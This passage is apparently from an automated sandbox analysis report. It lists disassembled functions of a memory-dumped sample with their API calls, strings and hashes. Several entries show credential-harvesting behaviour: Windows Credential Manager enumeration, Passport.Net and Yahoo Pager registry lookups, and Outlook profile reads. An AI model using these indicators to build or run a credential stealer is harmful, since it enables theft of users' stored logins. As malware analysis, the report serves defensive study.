                                                                                                                                                  • Part of subcall function 00443946: strlen.MSVCRT ref: 00443953
                                                                                                                                                • strlen.MSVCRT ref: 00443E8C
                                                                                                                                                • memcpy.MSVCRT ref: 00443EB1
                                                                                                                                                • memcpy.MSVCRT ref: 00443EC7
                                                                                                                                                  • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CFB8
                                                                                                                                                  • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFE4
                                                                                                                                                  • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040CFFA
                                                                                                                                                  • Part of subcall function 0040CFC5: memcpy.MSVCRT ref: 0040D031
                                                                                                                                                  • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D03B
                                                                                                                                                • memcpy.MSVCRT ref: 00443F07
                                                                                                                                                  • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF6A
                                                                                                                                                  • Part of subcall function 0040CF27: memcpy.MSVCRT ref: 0040CF94
                                                                                                                                                  • Part of subcall function 0040CFC5: memset.MSVCRT ref: 0040D00C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpymemset$strlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2142929671-0
                                                                                                                                                • Opcode ID: 1fb1ec72e13faa5c4450662030dd608fc909945337c7cb58045cb7f4428127cf
                                                                                                                                                • Instruction ID: 7aa756fa7cbdb75c5c05895f31091f080fe59031f56f6a961c38bdf577465876
                                                                                                                                                • Opcode Fuzzy Hash: 1fb1ec72e13faa5c4450662030dd608fc909945337c7cb58045cb7f4428127cf
                                                                                                                                                • Instruction Fuzzy Hash: 5D513BB290011EAADB10EF55CC81AEEB3B9BF44218F5445BAE509E7141EB34AB49CF94
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5
                                                                                                                                                  • Part of subcall function 004045D6: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
                                                                                                                                                  • Part of subcall function 004045D6: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
                                                                                                                                                  • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
                                                                                                                                                  • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
                                                                                                                                                  • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
                                                                                                                                                  • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
                                                                                                                                                  • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                  • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F123
                                                                                                                                                • strlen.MSVCRT ref: 0040F133
                                                                                                                                                • _mbscpy.MSVCRT ref: 0040F144
                                                                                                                                                • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F151
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                • String ID: Passport.Net\*
                                                                                                                                                • API String ID: 2329438634-3671122194
                                                                                                                                                • Opcode ID: c0e35485f09b5a24e447f0910c227e843a67b38e8fc9a121e48f37b6dcdb3ffc
                                                                                                                                                • Instruction ID: b181dd8ad3303716fcb3fe51c6d72bcd9c0cca2a33dd7682b011125bf867cc1e
                                                                                                                                                • Opcode Fuzzy Hash: c0e35485f09b5a24e447f0910c227e843a67b38e8fc9a121e48f37b6dcdb3ffc
                                                                                                                                                • Instruction Fuzzy Hash: B5316D76900109EBDB20EF96DD45EAEB7B9EF85701F0000BAE604E7291D7389A05CB68
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00403158: strchr.MSVCRT ref: 0040326D
                                                                                                                                                • memset.MSVCRT ref: 004032FD
                                                                                                                                                • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403317
                                                                                                                                                • strchr.MSVCRT ref: 0040334C
                                                                                                                                                  • Part of subcall function 004023D7: _mbsicmp.MSVCRT ref: 0040240F
                                                                                                                                                • strlen.MSVCRT ref: 0040338E
                                                                                                                                                  • Part of subcall function 004023D7: _mbscmp.MSVCRT ref: 004023EB
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                                                • String ID: Personalities
                                                                                                                                                • API String ID: 2103853322-4287407858
                                                                                                                                                • Opcode ID: 4d90838e2d1a2817d3f702c1c820bc4a99c4f205016c2976f5c78779a4109539
                                                                                                                                                • Instruction ID: 94df084552130989d7eb446100fdb0be3a34b05fea2c71b6ffce82199638926a
                                                                                                                                                • Opcode Fuzzy Hash: 4d90838e2d1a2817d3f702c1c820bc4a99c4f205016c2976f5c78779a4109539
                                                                                                                                                • Instruction Fuzzy Hash: 5921BA71B04158AADB11EF65DC81ADDBB6C9F10309F1400BBFA44F7281DA78DB46866D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 004101EF
                                                                                                                                                • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 004101FC
                                                                                                                                                • memcpy.MSVCRT ref: 00410238
                                                                                                                                                Strings
                                                                                                                                                • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 004101EA
                                                                                                                                                • 00000000-0000-0000-0000-000000000000, xrefs: 004101F7
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FromStringUuid$memcpy
                                                                                                                                                • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                                                • API String ID: 2859077140-3316789007
                                                                                                                                                • Opcode ID: 47d2852bcb6be23f486a4ed132040bb4fca7e7f7f1bca8e0f8c40ade59038cba
                                                                                                                                                • Instruction ID: ae29383cbd57fcea5ed56c9c200a46c16443c4e74b3f506479b718b79cf0bdd8
                                                                                                                                                • Opcode Fuzzy Hash: 47d2852bcb6be23f486a4ed132040bb4fca7e7f7f1bca8e0f8c40ade59038cba
                                                                                                                                                • Instruction Fuzzy Hash: 1801C43790001CBADF019B94CC40EEB7BACEF4A354F004023FD55D6141E678EA8487A5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00443A57
                                                                                                                                                  • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                  • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00443AC3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseOpenQueryValuememset
                                                                                                                                                • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                                                • API String ID: 1830152886-1703613266
                                                                                                                                                • Opcode ID: 650c04e09b991093e9736741da7e0d3a8797bac6cd011315facee49111a37a9d
                                                                                                                                                • Instruction ID: 86b235c3fd45d03c271013e996efd952a38f3d6ae4618920ee3f021b32bc4f63
                                                                                                                                                • Opcode Fuzzy Hash: 650c04e09b991093e9736741da7e0d3a8797bac6cd011315facee49111a37a9d
                                                                                                                                                • Instruction Fuzzy Hash: 500192B6900118BBEB10AA55CD01FAE7A6C9F90715F140076FF08F2212E379DF5587A9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00409031
                                                                                                                                                • GetPrivateProfileStringA.KERNEL32(00451308,0000000A,0044551F,?,00001000,00451200), ref: 00409053
                                                                                                                                                • _mbscpy.MSVCRT ref: 0040906D
                                                                                                                                                Strings
                                                                                                                                                • {?@ UD, xrefs: 0040900D
                                                                                                                                                • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 0040901A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfileString_mbscpymemset
                                                                                                                                                • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>${?@ UD
                                                                                                                                                • API String ID: 408644273-2682877464
                                                                                                                                                • Opcode ID: 378cf609773933abd0cbf0de7e3743951131b1a096d6e983a9466431b2c11096
                                                                                                                                                • Instruction ID: 644781a60c69e86f7c2c511092586478b4ed4a6ca21543a67b17e89033411e60
                                                                                                                                                • Opcode Fuzzy Hash: 378cf609773933abd0cbf0de7e3743951131b1a096d6e983a9466431b2c11096
                                                                                                                                                • Instruction Fuzzy Hash: 53F0E9729041987BEB129764EC01FCA77AC9B4974BF1000E6FB49F10C2D5F89EC48AAD
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLastMessagesprintf
                                                                                                                                                • String ID: Error$Error %d: %s
                                                                                                                                                • API String ID: 1670431679-1552265934
                                                                                                                                                • Opcode ID: 69570e8fca1396db75b798702dd88894c728b3c47429f38a677bbfbefaa49fd2
                                                                                                                                                • Instruction ID: c7de35334a9b91ea45d990eb2cc533a67ee34048a8af2c328f2cc0c5e5106846
                                                                                                                                                • Opcode Fuzzy Hash: 69570e8fca1396db75b798702dd88894c728b3c47429f38a677bbfbefaa49fd2
                                                                                                                                                • Instruction Fuzzy Hash: BBF0ECBA90010877DB11BB54DC05F9A77FCBB81304F1500B6FA45F2142EE74DA058F99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,75C571C0,00405E9E,00000000), ref: 00410912
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00410920
                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00410938
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                                                • String ID: SHAutoComplete$shlwapi.dll
                                                                                                                                                • API String ID: 145871493-1506664499
                                                                                                                                                • Opcode ID: f25734f4fc4b11147bd7f5e2528d9bf4594faa664b5814fe0a2756d8d7966d13
                                                                                                                                                • Instruction ID: 7569959bf229cfaf5f1ab8cb2858e1476927bfd88fe16924fdc565eaa6c9b3dd
                                                                                                                                                • Opcode Fuzzy Hash: f25734f4fc4b11147bd7f5e2528d9bf4594faa664b5814fe0a2756d8d7966d13
                                                                                                                                                • Instruction Fuzzy Hash: 15D05B797006107BFB215735BC08FEF6AE5DFC77527050035F950E1151CB648C42896A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$memcpy
                                                                                                                                                • String ID: $no query solution
                                                                                                                                                • API String ID: 368790112-326442043
                                                                                                                                                • Opcode ID: d1b20270b8fca8508a10612e54657d8b0a662355ac249add9ed08d121aaec26c
                                                                                                                                                • Instruction ID: 5801c9734c6bd427e286c4e355069e6ae2e92931dd4aa2b8c604a71db9229eec
                                                                                                                                                • Opcode Fuzzy Hash: d1b20270b8fca8508a10612e54657d8b0a662355ac249add9ed08d121aaec26c
                                                                                                                                                • Instruction Fuzzy Hash: D012AC75D006199FCB24CF99D481AAEF7F1FF08314F14915EE899AB351E338A981CB98
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • foreign key on %s should reference only one column of table %T, xrefs: 0043005F
                                                                                                                                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430087
                                                                                                                                                • unknown column "%s" in foreign key definition, xrefs: 0043027A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy
                                                                                                                                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                • API String ID: 3510742995-272990098
                                                                                                                                                • Opcode ID: ba7cc926a2513b3f0d61d7686d9ea4b43c1dda64fb95451b7aee5590be9ae86f
                                                                                                                                                • Instruction ID: b65499b1f20d22348a3d217da3c858198d90c87fbf4aa33eef889ec12c855700
                                                                                                                                                • Opcode Fuzzy Hash: ba7cc926a2513b3f0d61d7686d9ea4b43c1dda64fb95451b7aee5590be9ae86f
                                                                                                                                                • Instruction Fuzzy Hash: BFA14C75A00209DFCB14CF99D590AAEBBF1FF48304F14869AE805AB312D779EE51CB94
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset
                                                                                                                                                • String ID: H
                                                                                                                                                • API String ID: 2221118986-2852464175
                                                                                                                                                • Opcode ID: 82ed15864ef5b3a3dd0266e33bdbcb26a787e81eb1be7ca6d5995a5f4ce5c711
                                                                                                                                                • Instruction ID: 0231d824907604898156c72f74438a53b00a2a6e63cdef361d574d9feb60fc4e
                                                                                                                                                • Opcode Fuzzy Hash: 82ed15864ef5b3a3dd0266e33bdbcb26a787e81eb1be7ca6d5995a5f4ce5c711
                                                                                                                                                • Instruction Fuzzy Hash: 9D915775C00219DBDF20CF95C881AAEF7B5FF48304F14949AE959BB241E334AA85CFA5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcmp$memcpy
                                                                                                                                                • String ID: @ $SQLite format 3
                                                                                                                                                • API String ID: 231171946-3708268960
                                                                                                                                                • Opcode ID: 5952f075a97c97ad06d3c6058b6006b849409e8323ae21947051dcee29b786b4
                                                                                                                                                • Instruction ID: 154dd893183b882ddc8616fc7eef56b16fb129afe1b119523047def7d92feb70
                                                                                                                                                • Opcode Fuzzy Hash: 5952f075a97c97ad06d3c6058b6006b849409e8323ae21947051dcee29b786b4
                                                                                                                                                • Instruction Fuzzy Hash: C451B1B1E00604AFDB20DF69C881BDAB7F5AF54308F14056FD44597741E778EA84CBA9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy
                                                                                                                                                • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                                                • API String ID: 3510742995-3170954634
                                                                                                                                                • Opcode ID: d7603b0dda69ecf518d4b766e7e4f504cd7a7b4266dab8eccfe297bae9d2bc32
                                                                                                                                                • Instruction ID: 0d7bce0817bf65c9dfa0535c92c7df176da35528cc665cc261d5cec065e4eab6
                                                                                                                                                • Opcode Fuzzy Hash: d7603b0dda69ecf518d4b766e7e4f504cd7a7b4266dab8eccfe297bae9d2bc32
                                                                                                                                                • Instruction Fuzzy Hash: 4361C031A046259FDB14DFA4D480BAEBBF1FF48304F55849AE904AB392D738ED51CB98
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                • String ID: winWrite1$winWrite2
                                                                                                                                                • API String ID: 438689982-3457389245
                                                                                                                                                • Opcode ID: 0d7f83051426e72d393f7901bd0e4f2f845d9ffb714df67e86fd0046f80122d9
                                                                                                                                                • Instruction ID: 411cc920c71d47ae3c136763a4be7e00f30539a89a3c59ace8e577baf045dca9
                                                                                                                                                • Opcode Fuzzy Hash: 0d7f83051426e72d393f7901bd0e4f2f845d9ffb714df67e86fd0046f80122d9
                                                                                                                                                • Instruction Fuzzy Hash: F9417F72A00209EBDF00CF95CC41ADE7BB5FF48315F14452AF614A7280D778DAA5CB99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                • String ID: winRead
                                                                                                                                                • API String ID: 1297977491-2759563040
                                                                                                                                                • Opcode ID: ffe010aae32d2fe9b2a966a78d406535a1fbcfae657499b63a226c622339ee24
                                                                                                                                                • Instruction ID: 3967e01906e40ec71704122980e40950556eef8199585a058b54f4718b0c424a
                                                                                                                                                • Opcode Fuzzy Hash: ffe010aae32d2fe9b2a966a78d406535a1fbcfae657499b63a226c622339ee24
                                                                                                                                                • Instruction Fuzzy Hash: 46318B72A00309ABDF10DE69CC86ADE7B69AF84315F14446AF904A7241D734DAA48B99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                  • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                • memset.MSVCRT ref: 0040A8F8
                                                                                                                                                  • Part of subcall function 0041096F: memcpy.MSVCRT ref: 004109DD
                                                                                                                                                  • Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
                                                                                                                                                  • Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D
                                                                                                                                                • sprintf.MSVCRT ref: 0040A93D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                                                                                • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                • API String ID: 3337535707-2769808009
                                                                                                                                                • Opcode ID: b0ab3c576635bf4da161b26e96517a42775f10b149b223ac01af6493df536d2f
                                                                                                                                                • Instruction ID: b3463478cabe4832a9b1b799bbf2f925c18d395200ae258af25e9b21d14a16f2
                                                                                                                                                • Opcode Fuzzy Hash: b0ab3c576635bf4da161b26e96517a42775f10b149b223ac01af6493df536d2f
                                                                                                                                                • Instruction Fuzzy Hash: 3611BF31600225BFEB11AF64CC42F957B64FF04318F10406AF509265A2DB7ABD70DB89
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _mbscat$memsetsprintf
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 125969286-0
                                                                                                                                                • Opcode ID: cfc2cdd9402285d373237ff41ddaadf9cb54e449d46b0907ea735e806236394e
                                                                                                                                                • Instruction ID: 1eb43bd5b8120d09ab0b11fdee56c07fa856cfecb869048c22175c4298d2535e
                                                                                                                                                • Opcode Fuzzy Hash: cfc2cdd9402285d373237ff41ddaadf9cb54e449d46b0907ea735e806236394e
                                                                                                                                                • Instruction Fuzzy Hash: EF014C32D0826436F72156159C03BBB77A89B85704F10407FFD44A92C1EEBCE984479A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetParent.USER32(?), ref: 00408E33
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00408E40
                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00408E4B
                                                                                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00408E5B
                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00408E77
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4247780290-0
                                                                                                                                                • Opcode ID: 06bcd35f29f4ad8b1f8be6fafa23155ea8198cc34ea2cee51d518efb77a86cea
                                                                                                                                                • Instruction ID: d5d25afb3259b03ed1d628add5c616d0d22dc24c96253af88726d5856d44a725
                                                                                                                                                • Opcode Fuzzy Hash: 06bcd35f29f4ad8b1f8be6fafa23155ea8198cc34ea2cee51d518efb77a86cea
                                                                                                                                                • Instruction Fuzzy Hash: 0E01653680052ABBDB11ABA59C49EFFBFBCFF06750F04402AFD05A2181D77895018BA5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B70C
                                                                                                                                                  • Part of subcall function 00406A00: LoadCursorA.USER32(00000000,00007F02), ref: 00406A07
                                                                                                                                                  • Part of subcall function 00406A00: SetCursor.USER32(00000000), ref: 00406A0E
                                                                                                                                                • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B72F
                                                                                                                                                  • Part of subcall function 0040B65E: sprintf.MSVCRT ref: 0040B684
                                                                                                                                                  • Part of subcall function 0040B65E: sprintf.MSVCRT ref: 0040B6AE
                                                                                                                                                  • Part of subcall function 0040B65E: _mbscat.MSVCRT ref: 0040B6C1
                                                                                                                                                  • Part of subcall function 0040B65E: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B6E7
                                                                                                                                                • SetCursor.USER32(?,?,0040C8F2), ref: 0040B754
                                                                                                                                                • SetFocus.USER32(?,?,?,0040C8F2), ref: 0040B766
                                                                                                                                                • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040B77D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2374668499-0
                                                                                                                                                • Opcode ID: 53ade561a914af880d1e6a05375d4a59a2fac5c4dfd76dfdfba0808ab67976fb
                                                                                                                                                • Instruction ID: 612281c0e7bcc4a6d3b4da52a7b96f70e992a4283d6ab6b50bd9db3d0aad170a
                                                                                                                                                • Opcode Fuzzy Hash: 53ade561a914af880d1e6a05375d4a59a2fac5c4dfd76dfdfba0808ab67976fb
                                                                                                                                                • Instruction Fuzzy Hash: 120129B5200A00EFD726AB75CC85FA6B7E9FF48315F0604B9F1199B272CA726D018F14
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040AAB7
                                                                                                                                                • memset.MSVCRT ref: 0040AACD
                                                                                                                                                  • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                  • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                  • Part of subcall function 0040A245: _mbscpy.MSVCRT ref: 0040A24A
                                                                                                                                                  • Part of subcall function 0040A245: _strlwr.MSVCRT ref: 0040A28D
                                                                                                                                                • sprintf.MSVCRT ref: 0040AB04
                                                                                                                                                Strings
                                                                                                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040AAD2
                                                                                                                                                • <%s>, xrefs: 0040AAFE
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
